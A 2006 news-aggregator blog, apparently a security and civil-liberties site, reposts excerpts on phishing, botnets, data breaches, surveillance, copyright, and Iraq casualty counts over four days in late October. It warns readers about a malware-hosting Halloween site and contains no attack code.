Saturday, October 28, 2006

Getting Ready for Guy Fawkes Day: V for Vendetta




As many of you may already know, V for Vendetta came out of DVD back in August, but if somehow you missed it in it's theatrical release, you should be really see it on DVD.

I watched it several times, and I am never disappointed -- each time it rocks.

I urge you to see it.

V for Vendetta IMDB.com details here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Saturday, Oct. 28, 2006, at least 2,812 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is four more than the Defense Department's tally, last updated Friday at 1 p.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casuality Count website here.

FBI Returns to 'Fake Boarding Pass' Guy's Home, Seizes Computers - Updated

A bit heavy-handed, methinks.

Via Boing Boing.

Christopher Soghoian today blogs that the FBI returned to his home last night in his absence with a search warrant, and seized computers and other belongings.

The 24-year old computer science student is the creator of a website that generated fake airline boarding passes to illustrate a security flaw which has been documented on the 'net since (at least) 2003.

More here.

Update: More here.

Toon: The Scary Season


Click for larger image.


BBC: Call for Legal Copying of Own CDs

Via The BBC.

Copyright laws are "out of date" and must be updated so MP3 player users can make copies of CDs without breaking the law, according to a think tank.

The Institute for Public Policy Research argues that consumers' rights should be improved with a "new private right to copy".

It is also calling on the government to reject demands for the music copyright term to be extended beyond 50 years.

The IPPR recommendations are ahead of a review of intellectual property laws.

The review of the laws has been commissioned by Chancellor Gordon Brown.

The IPPR report, published on Sunday, says millions of consumers break the law every year by copying CDs and DVDs on to their computers. It is calling for changes to the centuries-old copyright laws.

More here.

Fall Back: Daylight Savings Time Ends Tonight


Don't forget:

At 2 a.m. on October 29, groggy Americans will turn their clocks back one hour, marking the end of Daylight Saving Time (DST).

- ferg

Dilbert: Godwin's Law Every Time


Click for larger image.


Greek Blogger Arrested on Eve of IGF in Athens

Kieren McCarthy writes:

The Internet Governance Forum will start on Monday morning but already the debate has started - and it is surrounding freedom of speech online.

There are several reports that the Greek authorities arrested a man for linking - not writing, but linking - to blog posts that had satirised a businessman (possibly a TV evangelist). The businessman complained to the police and the police picked up the adminstrator of blog aggregation site blogme.gr - and charged him.

Update: The man arrested was Antonis Tsipropoulos and the target of the satire was Dimosthenis Liakopoulos - a controversial Greek tele-evangelist. The satire site that mocks Mr Liakopoulos can be found at funel.blogspot.com, but since it is hosted in the US, neither the Greek authorities nor even Mr Liakopoulos can get at it.

What Mr Tsipropoulos has been charged with, god only knows. But this is a spectactular own goal by the Greek authorites on the eve of the IGF. Particularly since making a crime of linking to someone else’s content is pure, and legally foolhardy, censorship.

It’s all over the Greek blogosphere, but I can’t understand the majority of it. Except for the fact that there appears to be movement building to protest outside the conference hotel as a statement against the arrest.

More here.

Denver D.A. Issues Computer Security Alert, P2P File Sharing

Via Technology News Daily.

The Denver District Attorney’s Office is issuing an urgent alert to computer users who use file-sharing software, specifically LimeWire.

During the course of a routine identity theft investigation, the Denver Police Department executed a search warrant at a Denver apartment and recovered personal and financial information from approximately 75 different individual and business account names from all over the country. The information, which included tax records, bank account information, online bill paying records and other material, appears to have been stolen directly from computers that were using LimeWire, a filesharing software program.

It appears that the file-sharing program was exploited to enable someone sitting at a computer in Denver to illegally access everything – every file, every document – on computers across the country.

The investigation is continuing, and we are urging people who use LimeWire or other file-sharing software to ensure that their computer security is up to date including adequate firewall security, antivirus software, and other measures.

More here.

U.S. Seen Balking at Challenge by Islamist Web

David Morgan writes for Reuters:

The Bush administration is failing to counter Islamist online propaganda that could propel militancy into the next generation, experts say.

From the Middle East, Asia and Europe, Islamists have built an expansive Internet library of sophisticated texts on the ideology that underpins violence against the West and other enemies, analysts and intelligence officials said.

More here.

Friday, October 27, 2006

MySpace Phishing Attack Appears on 3000 Pages

Kelvin Beecroft writes on Mashable!:

Earlier this week I detected many fake MySpace login pages setup for phishing login credentials. I thought there was something important to report but after further investigation I found that these pages did absolutely nothing because the HTML missed an important attribute in the post form. This is the “action” attribute which tells the form what to do when you click login. “They’ve been neutralized by my MySpace”, I thought. But I was wrong.

A proportion of these pages are today active and will steal your email and password if you give it to them. The fake login pages are very convincing and even fooled Firefox into automatically filling in my credentials. Even cautious Internet users could get caught off guard by this trick.

It appears they then use the compromised accounts to spam other MySpace users via bulletins. But they do more than just send out spam. They also add their fake login code to the compromised pages in a tricky way so that it hides the original page underneath, giving them even more fake login pages.

More here.

EU Data Watchdog: Europe Risks Becoming 'Surveillance Society'

Alan Brackley writes on the Cyprus Observer:

Europeans risk coming under permanent surveillance, if European Union governments continue to meet US demands for access to personal data on their nationals, the EU’s data watchdog has warned.

A recent transatlantic deal on sending key European air passenger data to authorities in the United States “is a slippery slope which shows a lot of ambiguity and leaves room for much interpretation,” European Data Protection Supervisor Peter Hustinx said in an interview with Deutsche Presse-Agentur dpa.

Hustinx, who monitors the processing of personal data by EU institutions, has the power to take cases of privacy infringements to the EU Court of Justice, the bloc’s top legal body. As the data protection supervisor, he acts independently of EU institutions and gives governments and EU bodies advice on security standards.

More here.

(Props, Flying Hampster.)

California Governor Creates Task Force to Spur Broadband

Mary Anne Ostrom writes in The Mercury News:

Saying California lags other states in government policies that promote high-speed Internet access, Gov. Arnold Schwarzenegger Friday signed an executive order to set up a task force to streamline permitting and speed up the construction of broadband networks.

"We have to make sure government is not an obstacle," Schwarzenegger said during a San Francisco medical symposium exploring how to use high-speed Internet connections to diagnose patients in distant locations.

During a press conference, surrounded by executives from Microsoft, Cisco and Juniper Networks, among others, Schwarzenegger cited a three-year-old TechNet study that found that California ranked 14th among 50 states in government policies that encourage broadband. About half of the state's population has access to broadband, mirroring national figures.

More here.

Lawsuit Challenges Google 'Fairness' Rankings

A Reuters newswire article by Eric Auchard, via Yahoo! News, reports that:

A federal judge on Friday questioned whether Google Inc. defamed a small company by cutting it from its Web search ranking system or whether Google is free to choose which sites it features.

Judge Jeremy Fogel of the U.S. District Court for the Northern District of California heard arguments in a lawsuit by KinderStart.com LLC that seeks to challenge the fairness of how Google calculates the relative popularity of Web sites.

More here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Friday, Oct. 27, 2006, at least 2,810 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Friday at 1 p.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casuality Count website here.

Local: Suspended SJ Cheerleader Sues School Over MySpace Pics

Via NBC11.com.

A former cheerleader from Leland High School was suspended from the squad after attending a raucous Halloween party two years ago. Now she's suing, NBC11's Stacey Ciauri reported.

The 17-year-old plaintiff, Jaimee Bruno, filed a sex discrimination lawsuit against Leland High School after she alleges that educators selectively suspended five female cheerleaders for attending a 2005 party, but took no action against the male athletes.

Photos from the Halloween party were posted on MySpace, showing the cheerleaders dressed in scantily-clad costumes, along with other students drinking and smoking.

More here.

No Child Left Behind ‘Privacy’ Policy Under Attack

Mike Belt writes in the Lawrence (Kansas) Journal-World:

Buried in the 670 pages of the federal No Child Left Behind law was a requirement that high schools provide lists of students’ names, telephone numbers and addresses to military recruiters.

Students can get off the list if they or their parents notify the school district in writing that they want to opt out.

But there’s a catch. Those who opt off the list find themselves also excluded from the lists provided to college and job recruiters. And opting out also means a student’s name cannot be published in yearbooks, honor rolls or newspapers.

More here.

Botnets Likely Behind Jump in Spam

Robert Lemos writes on SecurityFocus:

A significant rise in the global volume of spam in the past two months has security analysts worried that bot nets are increasingly being used by spammers to stymie network defenses erected to curtail bulk e-mail.

Estimates of the magnitude of the increase in junk e-mail vary, but experts agree that an uncommon surge in spam is occurring. On the low side, Symantec, the owner of SecurityFocus, has found that average spam volume has increased almost 30 percent for its 35,000 clients in the last two months. Others have seen much more significant jumps: Spam black list maintainer Total Quality Management Cubed has seen a 450 percent increase in spam in two months, and the amount of spam filtered out every week by security software maker Sunbelt Software has more than tripled compared to six months ago.

More here.

(Note: Minor quote from me on page 2.)

C|Net: The Worst Political Websites

Website of Rep. Bob Inglis, South Carolina (R)
Image source: InglisForCongress.com / C|Net



C|Net has a humorous look at poorly design, and just plain non-functional, political websites.

Definitely worth the time to peruse.

As Anne Broache and Declan McCullagh write:

The problem in selecting the most ridiculous, poorly crafted, or just plain bizarre political Web sites is an embarrassment of riches: There are so many worthy contenders.

Link.

Congressman Ed Markey Wants Security Researcher Arrested

Ryan Singel writes on 27B Stroke 6:

Congressman Edward Markey (D-Mass.) wants the federal government to arrest security researcher Christopher Soghoian for creating the Northwest Airline Boarding Pass Generator, a site which lets anyone create a facsimile of a Northwest Airlines boarding pass. Soghoian hoped to spur Congress to look closely at the nation's aviation security policies, which he calls "security theater."

Instead, Markey, a member of the House Homeland Security committee, wants the site shut down and Soghoian arrested.

"The Bush Administration must immediately act to investigate, apprehend those responsible, shut down the website, and warn airlines and aviation security officials to be on the look-out for fraudsters or terrorists trying to use fake boarding passes in an attempt to cheat their way through security and onto a plane," Markey said in a statement. "There are enough loopholes at the backdoor of our passenger airplanes from not scanning cargo for bombs; we should not tolerate any new loopholes making it easier for terrorists to get into the front door of a plane."

Soghoian, a Ph.D. student at Indiana University, says he has never used one of the fake boarding passes, which are likely good enough to get someone past airline security, but not good enough to get you on the plane. He was waiting for clearance from lawyers at Indiana University before attempting to do so.

More here.

Toon: Hallowe'en Spooks


Click for larger image.


Disaster Tech: Bush Signing Statement Asserts Right to Ignore Criteria for FEMA Director

Somehow I missed this when it was first published, but thanks to the folks over at Crooks and Liars... I'm speechless.

Spencer S. Hsu writes in The Washington Post:

President Bush reserved the right to ignore key changes in Congress's overhaul of the Federal Emergency Management Agency -- including a requirement to appoint someone with experience handling disasters as the agency's head -- in setting aside dozens of provisions contained in a major homeland security spending bill this week.

Besides objecting to Congress's list of qualifications for FEMA's director, the White House also claimed the right to edit or withhold reports to Congress by a watchdog agency within the Department of Homeland Security that is responsible for protecting Americans' personal privacy.

More here.

Britain Criticizes U.S. Online Gambling Ban

An AP newswire article by Jane Wardell, via The Washington Post, reports that:

Britain's culture secretary on Friday compared the U.S. crackdown on online gambling to the failed alcohol ban of the Prohibition as she prepared to host an international summit on Internet gambling next week.

Tessa Jowell warned that the U.S. ban on Internet gambling would make unregulated offshore sites the "modern equivalent of speakeasies," illegal bars that opened in 1920s America when alcohol was banned.

More here.

F-Secure: Reselling Domain Names... to Phishing Gangs


Image source: F-Secure

Mikko writes over on the F-Secure "News from the Lab" Blog:

There's a very active aftermarket in domain names. These are domain names that have already been registered and are now being resold. For example, hell.com and auction.com are being auctioned today for highest bidders and they are expected to be sold for several million dollars each.

But most domain names are resold for a few hundred or a few thousand dollars (where the original registration price is typically $5 to $15).

Largest domain resellers include Sedo and Moniker.

There's nothing wrong in reselling cool domains like tractors.com, filmlist.com or 4fares.com to anyone who wants to buy them.

But how about reselling domain that obviously belong to banks or other financial institutions?

More here.

Scottish Call Centers Infiltrated by Organized Crime?

Fiona Raisbeck writes on SC Magazine Online:

One in ten of Glasgow's call centres have been infiltrated by criminal gangs, according to Strathclyde Police.

The organised gangs are said to be planting members inside call centre offices or forcing current workers to reveal sensitive customer data. The details are then used to steal identities and set up accounts or transfer money in laundering scams.

Detectives believe the criminal groups actively recruit volunteers to work in call centres and once they agree they are asked to provide sensitive financial information in return for a fee. Officers suspect the gang members also target innocent employees in pubs and intimidate them to obtain customer data.

More here.

MySpace Accounts Compromised by Phishers

Via Netcraft.

Netcraft has discovered that the social networking site, MySpace, appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form is designed to submit the victim's username and password to a remote server hosted in France.

The hackers have engineered a fake login form on MySpace's own web site.

Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting (XSS) or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

The modifed login form, hosted on myspace.com. Login details are harvested by a remote server, hosted in France.

More here.

Amnesty Int.'l Releases API to Access Censored Files

Nick Farrell writes on The Inquirer:

AMNESTY INTERNATIONAL is set to release an API to its data base of politically-censored material from to enable people to develop software to get the information into their own sites and blogs.

The irrepressible.info campaign, launched in May, provides javascript banners featuring censored sites and content. The API will give direct access to the irrepressible.info site’s database of censored material so that supporters can create their own applications to distribute the information better.

Amnesty hopes that someone will come up with ways making irrepressible.info accessible to social networking sites like MySpace and Bebo, who can't use the Javascript based banner system irrepressible.info runs now.

More here.

MySpace Deletes Sex DVD Comments

Via TheAge.com.au.

Social networking website myspace has deleted the accounts of several users allegedly involved in the production of a DVD at the centre of a rape investigation after other internet users alerted site administrators.

The DVD, which allegedly shows a gang of teenage boys sexually assaulting a girl, then setting her hair on fire and urinating on her, provoked outrage across the country when it was revealed earlier this week.

More here.

Steve Irwin Visits South Park


Image source: Comedy Central / TheAge.com.au


An AAP newswire article, via TheAge.com.au, reports that:

The creators of the South Park cartoon series are unrepentant about a new episode that shows Crocodile Hunter Steve Irwin attending a party in Hell with a stingray barb protruding from his chest.

Irwin died just eight weeks ago when a stingray barb pierced his heart as he was filming off the north Queensland coast.

The South Park episode, which had been scheduled for broadcast in the US on Wednesday, is expected to upset Irwin fans and his family - wife Terri and children Bindi and Bob.

But the show's creators say it's not the first time their work has created waves.

More here.

Australia: Watchdog Warns on Broadband Claims

An AAP newswire article by Xavier La Canna, via Australian IT, reports that:

Australia's competition watchdog has warned telcos racing to offer high-speed internet access not to mislead consumers with false claims about service speeds.

The head of the Australian Competition and Consumer Commission (ACCC) Graeme Samuel issued the warning after an address at a business lunch in Melbourne.

"We are just saying to all the telecommunications companies just be careful, you may be overstepping the mark in terms of misleading and deceptive conduct," Mr Samuel said.

He highlighted companies offering ADSL internet access with potential speeds of 24Mbps, to warn that these speeds are largely unachievable.

More here.

Thursday, October 26, 2006

Politics: Rolling Stone: 'Worst. Congress. Ever.'




Matt Taibbi writes a blistering editorial to accompany this issue of Rolling Stone magazine's Cover Story [above], in which he describes "...how our national legislature has become a stable of thieves and perverts -- in five easy steps."

Really worth a read. Some funny, some satire, some stark & sobering.

One of my favorite opening salvos:

"These past six years were more than just the most shameful, corrupt and incompetent period in the history of the American legislative branch. These were the years when the U.S. parliament became a historical punch line, a political obscenity on par with the court of Nero or Caligula -- a stable of thieves and perverts who committed crimes rolling out of bed in the morning and did their very best to turn the mighty American empire into a debt-laden, despotic backwater, a Burkina Faso with cable."

Blistering.

Link.

Computer With Colorado Human Services Data Stolen

An AP newswire article, via CBS4Denver.com, reports that:

A computer containing personal information of some clients of the Colorado Department of Human Services was stolen from a Dallas-based firm that operates the Family Registry.

The desktop computer, which was stolen during the weekend of Oct. 13, had data on clients who were involved with child support payments. It was stored in a secure area monitored by surveillance cameras accessible only by password, said Dallas-based Affiliated Computer Services Inc.

Company spokesman Kevin Lightfoot said letters were sent to the clients about the theft and advised on how to protect their information.

More here.

U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Thursday, Oct. 26, 2006, at least 2,809 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,254 died as a result of hostile action, according to the military's numbers.

The AP count is one more than the Defense Department's tally, last updated Thursday at 10 a.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casuality Count website here.

Computer Breach at Ohio Children's Hospital

Vic Gideon writes on WKTC.com:

Overseas hackers have apparently accessed two computers at Children's hospital, one containing private patient data, the other billing and bank information.

The hospital is preparing to send out more than 200,000 letters informing patients of the breach. It's also given the F.B.I. information for the investigation.

The hackers apparently were from Germany and used computer loops through France, Turkey, and Canada, eventually landing data from Akron.

"It's absolutely terrifying in this day and age where information is power," says patient Jennifer Ferrick. "Privacy is of the utmost importance in the medical field."

More here.

Did Worm Infect Alaska Candidates' Website?

Anne Broache writes on C|Net News:

If you're a write-in candidate without major political party recognition, there's nothing quite like mysterious malicious software radiating from your Web site to earn you a little extra publicity.

That's what happened this week to Ted and Fran Gianoutsos, a husband-wife team running for governor and lieutenant governor, respectively, in Alaska's race.

Late last week, the candidates' Webmaster logged in to do some updates on the site, only to find that his "firewall went crazy." The problem? A 2-year-old Visual Basic script worm--known variously as Gaggle.D, I-Worm.Gedza and Gedza.A--apparently had wriggled its way into each page of the Gianoutsos' minimalist campaign site at http://www.tedandfran.com/who.htm.

More here.

California Shoppers: Schwarzenegger is Watching You

An AP newswire article, via CNN, reports that:

Gin or vodka? Ford or BMW? Perrier or Fiji water? Does the car you buy or what's in your fridge say anything about how you'll vote?

Gov. Arnold Schwarzenegger's campaign thinks so.

Employing technology honed in President Bush's 2004 victory, the Republican governor's re-election team has created a vast computer storehouse of data on personal buying habits and voter records to identify likely supporters. Campaign officials say the operation is the largest of its kind in any state, at any time.

Some strategists believe consumer information can reveal a voter's politics even better than a party label can.

More here.

Wi-Fi Exploits Coming to Metasploit

Ryan Naraine writes on eWeek:

The Metasploit Project plans to add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool, a move that simplifies the way wireless drivers and devices are exploited.

The controversial open-source project, created and maintained by HD Moore, of Austin, Texas, has added a new exploit class that allows modules to send raw 802.11 frames at one of the most vulnerable parts of the operating system.

More here.

Man Gets 5 Years for Hacking U.S. Army Computers

Dawn S. Onley writes on GCN.com:

A Wichita, Kan., man has received five years in federal prison for hacking into 13 Army computers to steal credit card numbers and account information.

Matthew R. Decker, 21, was sentenced last week, several months after he pleaded guilty to one count of accessing a protected computer and a single count of possession of unauthorized credit card account access devices.

Decker told authorities he used his home computer to illegally access 12 different Army computers on 17 different occasions, from Nov. 21 to Nov. 23, 2003. He stole credit card numbers from 531 Visa and MasterCard account holders, as well as full account information including names, addresses, Social Security numbers, dates of birth, and work and home phone numbers.

The computers Decker hacked into were at Fort Monroe, Va.

More here.

Port Reports Airport Worker Information Missing

Via The Port of Seattle.

The Port of Seattle announced today that six computer disks, containing personal information for 6,939 people who work for employers at Seattle-Tacoma International Airport, are missing. "We have no reason to believe that the information has been misused by anyone," said Mark Reis, managing director at Sea-Tac. "However, we do not know at this time whether the disks were misplaced, or were removed from Port property."

The disks were from the Airport I.D. Badging office, and had been scanned from paper I.D. forms. When it was discovered the disks were missing, the Port immediately conducted an investigation. As a precaution, the Port is sending letters to all individuals with names on the disks. No action is required by the individuals unless they are aware of any suspicious activity regarding their personal financial information; in that case, individuals should contact their financial and credit institutions.

The missing disks are from random dates, ranging from 2001 to early 2006, and carry names of employees from airlines, concessions, the Port and other employers at Sea-Tac. Some of the names may be of former employees.

More here.

DHS Loses Personal Data on 900 Employees

Alex Pulaski writes on The Oregonian:

Federal Homeland Security officials in Portland are trying to find a lost computer storage device that may have held personal information on more than 900 current and former employees.

The device, called a ThumbDrive, turned up missing Oct. 16 at the Transportation Security Administration's command center at Portland International Airport. The agency, born after the Sept. 11 terrorist attacks, has about 500 employees statewide who oversee airport security checkpoints.

Mike Irwin, federal security director at PDX, said the agency had spent the past several days trying to determine what information was on the drive and where it had gone.

More here.

Surveillance System Spots Violent Behavior

Duncan Graham-Rowe writes on NewScientistTech:

Smart surveillance systems capable of automatically detecting violent crimes could soon be available.

A computer vision system developed in the University of Texas in Austin, US, can already tell the difference between friendly behaviour, such as shaking hands, and aggressive actions like punching or pushing.

The hope is that such systems will simplify the task of monitoring huge quantities of CCTV security footage, says Sangho Park, who worked on the project with colleague Jake Aggarwal.

More here.

AllofMP3 Hit by Danish Court Ruling

John Oates writes on The Register:

Much reviled Russian music site allofmp3.com has been hit by a Danish court ruling which forces internet service provider Tele2 to block access to the site.

The Copenhagen City court ruled that Tele2 must do its best to ensure its subscribers cannot access the site. AllofMP3, or iTuneski as its known round here, insists it is legal but various international royalty groups insist it is not.

The case was brought by the Danish wing of the IFPI.

More here.

AT&T Launches Video Monitoring Service

An AP newswire article by Bruce Meyerson, via USA Today, reports that:

AT&T Inc. is introducing a home monitoring service that includes live video surveillance on a computer or cellphone, as well as lighting controls and detection sensors for motion, temperature changes and flooding.

The service being launched Thursday, priced at $9.95 per month, is compatible with any broadband Internet service. The cellular feature is limited to mobile phones from Cingular Wireless, a majority-owned subsidiary of AT&T, and requires the customer to subscribe to a wireless Internet package costing $10 to $20 a month, on top of voice plan fees.

A customer also needs to buy a $199 equipment package consisting of a tilt-and-pan video camera, a motion sensor for a door or window, a central router to connect those systems to the Internet, and two power-outlet modules that transmit the video between the camera and the router using the home's electrical wiring. Shipping is about $10 extra.

While a wide array of remote surveillance technologies have been available for some time, the AT&T system integrates a variety of capabilities and adds some novel features. There's no need, for example, to leave a home computer running to operate the system.

More here.

Online Documentary Details History of Government Surveillance

Via The ACLU.

From national civil rights activist Julian Bond to an ordinary Middle Eastern mother whose son and husband were imprisoned for a year with no charges brought against them, Tracked in America tells the compelling stories of 25 individuals who have been the targets of government surveillance. The online audio documentary -- launched today by a coalition of human rights, civil rights and educational organizations -- provides an in-depth look at U.S. government surveillance throughout history.

Tracked in America is available online at www.trackedinamerica.org and is being distributed by a broad partnership of groups ranging from the American Civil Liberties Union to the California Federation of Teachers. More than a million individuals make up the combined membership of the coalition.

More here.

Analysis: 'Total Information' Lives Again

Shaun Waterman writes for UPI:

The new U.S. intelligence czar is developing a computer system capable of data-mining huge amounts of information about everyday events to discern patterns that look like terrorist planning.

The technology is reminiscent of the axed Total Information Awareness program.

Civil liberties and privacy advocates criticized the effort, called Tangram, which is being developed by contractors working for the Office of the Director of National Intelligence.

More here.

Firefox 2.0 Releases Privacy Storm

Via Platinax Small Business News.

The most-awaited Firefox 2.0 was launched by the Mozilla Foundation yesterday - and immediately generated a storm of protests over privacy issues.

Key to privacy concerns is that Mozilla have set up their long-awaited phishing protection feature on Firefox 2.0 - but to use it properly, you have to send Google a record of every single website you visit.

A cookie will record all your behaviour data when using Firefox and provide the information free to Google, who can then use that information for their own commercial purposes.

Although, the feature does require an explicit opt-in, it’s an unwelcome trade-off for many Firefox users, who believe that there is no reason to tie-in phishing protection with providing free data to a billion-dollar multinational.

The concerns may be damaging to the Mozilla Foundation - who have long had a close relationship with Google - and who became a “for-profit” business last year.

More here.

(Props, Privacy.org)

Advocacy Group Sues DHS for Profiling

Via UPI.

An advocacy group is suing the U.S. Department of Homeland Security, alleging that they engaged in pre-election profiling of Arab-Americans and Muslims.

The American-Arab Anti Discrimination Committee has brought a Freedom of Information Act case against the department to force disclosure of the nationalities of more than 230 people detained by federal immigration authorities in the days leading up to the 2004 presidential election.

The detentions were part of a pre-election counter-terror push launched in October 2004, dubbed by the media the "October Plan," and called by officials the "Interagency Security Plan."

More here.

Digital Trail Helps Lead To Terror Hoax Suspect

Sharon Gaudin writes on InformationWeek:

The computer that a 20-year-old Wisconsin man used to make an online posting that threatened to detonate radioactive 'dirty bombs' may also have led to his discovery and arrest.

Computer forensics played a key role in the investigation that culminated in the Oct. 20 arrest of Jake J. Brahm of Wauwatosa, Wis. Brahm, who is a grocery store worker, was charged with one count of willfully conveying false information or hoaxes threatening buildings through the use of weapons of mass destruction and radiological dispersal devices. His threat involved setting off bombs in football stadiums in seven states on Oct. 22.

Brahm faces a maximum of five years in federal prison and a $250,000 fine.

More here.

Why So Little Attention to Botnets?

Ed Felten writes over on Freedom to Tinker:

Our collective battle against botnets is going badly, according to Ryan Naraine’s recent article in eWeek.

What’s that? You didn’t know we were battling botnets? You’re not alone. Though botnets are a major cause of Internet insecurity problems, few netizens know what they are or how they work.

In this context, a “bot” is a malicious software agent that gets installed on an unsuspecting user’s computer. Bots get onto computers by exploiting security flaws. Once there, they set up camp and wait unobtrusively for instructions. Bots work in groups, called “botnets”, in which many thousands of bots (hundreds of thousands, sometimes) all over the Net work together at the instruction of a remote badguy.

More here.

Researchers Criticize Security of Windows Mobile

Matt Hines writes on eWeek:

A new research report contends that by failing to offer onboard encryption for e-mail files stored on Windows Mobile devices, Microsoft may be putting itself at a competitive disadvantage and leaving users vulnerable to data loss.

According to the latest report published by J. Gold Associates, a Northborough, Mass.-based wireless research firm, Microsoft's decision not to offer file encryption capabilities on its Windows Mobile platform reflects poorly on the technology compared to other popular wireless systems.

Unlike the push e-mail systems offered by rival mobile software makers including Good Technology, Research In Motion and Sybase, Microsoft's wireless messaging technology doesn't include data protection beyond simple passwords, researchers said.

More here.

Wednesday, October 25, 2006

Trick or Treat: Hallowe'en Malware Websites Abound


Make sure your personal firewall is tuned up, your AV is up-to-date, etc., because bad guys have already started to use iFrame exploits to drop malware onto unsuspecting user machines who are visiting Hallowe'en websites that feature videos, wallpaper, sound files, etc.

This site:

http:// halloweensites.net/

... has been identified as a possible culprit.

Let's be careful out there, kids!

- ferg

(Props, Ivan!)

ACLU Uncovers FBI Surveillance of Maine Peace Activists

Via The ACLU.

The Maine Civil Liberties Union today released new documents revealing that the FBI has monitored the activities of peace activists, including Maine Veterans for Peace and Peace Action Maine.

The documents were turned over by the FBI in response to a Freedom of Information Act request filed by the MCLU. The FBI has previously released records detailing its surveillance of another local peace group, the Maine Peace and Justice Center.

More here.

Compromised PC Leads To Big Fraud Losses For E*Trade

Larry Greenemeier writes on InformationWeek:

A compromised PC opened the door for cyber attackers to wreak havoc on online broker E*Trade. The Securities and Exchange Commission, FBI, and other government enforcement agencies are investigating the crime, in which thieves conducted fraudulent transactions that cost the brokerage millions of dollars to cover customer losses.

E*Trade CEO Mitchell Caplan this week acknowledged during a conference call with financial analysts that his company "experienced a significant increase in losses resulting from fraud relating to identify theft." The fraudulent activity contributed to the $18 million in fraud losses the company reported during its third financial quarter. The company acknowledged in a statement that "the vast majority of online fraud is identity-theft related and is a result of a compromised personal computer."

More here.

Comcast Suffers Rash of VoIP, Broadband Outages

Alan Breznick writes on Light Reading:

Comcast Corp., the nation's biggest broadband provider, appears to be running into a rash of outages with its broadband and VOIP services in the Northeast U.S. this month, to judge from subscriber complaints.

In the latest incident, new Comcast Digital Voice customers in New Jersey reported problems with their VOIP service earlier today after the MSO completed what it termed "routine maintenance" on its cable plant last night. Subscribers said they lost phone service for several hours as Comcast technicians scrambled to locate the problem.

More here.

Political Toon: More Death of Habeas Corpus


Click for larger image.


U.S. Toll in Iraq

Via The Boston Globe (AP).

As of Wednesday, Oct. 25, 2006, at least 2,804 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes seven military civilians. At least 2,248 died as a result of hostile action, according to the military's numbers.

The AP count is two more than the Defense Department's tally, last updated Wednesday at 10 a.m. EDT.

More here.

And as always, cryptome.org keeps a very, very extensive list here, as does the Iraq Coalition Casuality Count website here.

Political Bloggers Coordinate 'Google Bombs'

A National Journal article by Heather Greenfield, via MSNBC, reports that:

The 2006 campaign is about to be "Google-bombed." Both liberal and conservative bloggers have embarked on plans to manipulate the Google search engine so that negative articles about the candidates they oppose appear near the top, potentially influencing undecided voters.

Liberal bloggers had the idea first. Chris Bowers of MyDD outlined the strategy Sunday. He said the plan involves purchasing "Google AdWords that will place each negative article on the most common searches for each Republican candidate. Simultaneously, I will produce an article on MyDD that embeds that negative article into a hyperlink."

Bowers asked bloggers to help add links, and they spent the next few days compiling negative news articles on Republican candidates in about 50 targeted races.

More here.

Blind Web Surfers Sue for Accessibility

An AP newswire article by Seth Sutel, via ABC News, reports that:

...like any evolving technology, accessing the Internet has hardly been a smooth ride for the blind. Some sites can be difficult to navigate, particularly if they contain relatively few text links and rely more on graphics and other visual elements that screen-reading software such as Jaws can't interpret.

That's why the NFB, an organization that represents blind people, is suing Target Corp., saying that its Web site is inaccessible to blind Internet users.

Last month a federal judge in California allowed the NFB's case to proceed, rejecting Target's argument that its Web site wasn't subject to the Americans With Disabilities Act, a 1990 law that requires retailers and other public places to make accommodations for people with disabilities. Target argued that the law only covered physical spaces.

More here.

Beginning Jan. 8, 2007, Anyone Entering U.S. by Air Must Carry Passport

David Armstrong writes in The San Francisco Chronicle:

A controversial rule requiring U.S. citizens and foreigners entering the country from Canada, Mexico and the Caribbean by air to carry passports will soon go into effect, even as complaints that the rule will slow international trade and befuddle tourists continue to be raised.

The State Department's Western Hemisphere Travel Initiative mandates the use of passports as of Jan. 8 for air travelers from neighboring countries in place of rules that allowed driver's licenses and birth certificates to do the job.

Moreover, as early as Jan. 1, 2008 -- and not later than June 1, 2009 -- the passport rule will go into effect for travelers arriving by land and sea from previously exempt neighboring countries.

More here.

Quote of the Day: Scott Adams

"As I write this, my Internet connection has been down for a day. I don’t want to sound as if I’m starting to panic or anything, but I’d be lying if I said I hadn’t given some thought to binge drinking."

- Scott Adams, over on The Dilbert Blog.

California: Man Allegedly Drugged, Burned After Meeting Brazilian Woman Online

Whoa.

John Coté writes in The San Francisco Chronicle:

Raymond Merrill bought a $5,000 engagement ring for Regina Filomena Rachid and declared in e-mails, "I have more kisses for you than there are stars in the sky."

Rachid's photos adorned his computer desktop and the walls in the San Bruno home he was fixing up. He had a stack of the Brazilian woman's glamour shots -- one with her topless, her jeans seductively unzipped partway. Wedding plans were discussed, messages on his computer show.

Merrill, a 56-year-old divorced carpenter and musician, thought he had found love online.

Instead, authorities believe Rachid lured Merrill to Brazil and masterminded a plot in which he was drugged for about six days until he disclosed his bank account information, then was strangled and his body set on fire, according to Merrill's sister, a friend and Brazilian news accounts.

More here.

Microsoft Decries Vista PatchGuard Hack

Matt Hines writes on eWeek:

Microsoft officials say they are unhappy that security software maker Authentium has decided to bypass the controversial PatchGuard kernel protection feature in its next-generation Vista operating system, and said that the tactic could lead to eventual problems for users of the company's software.

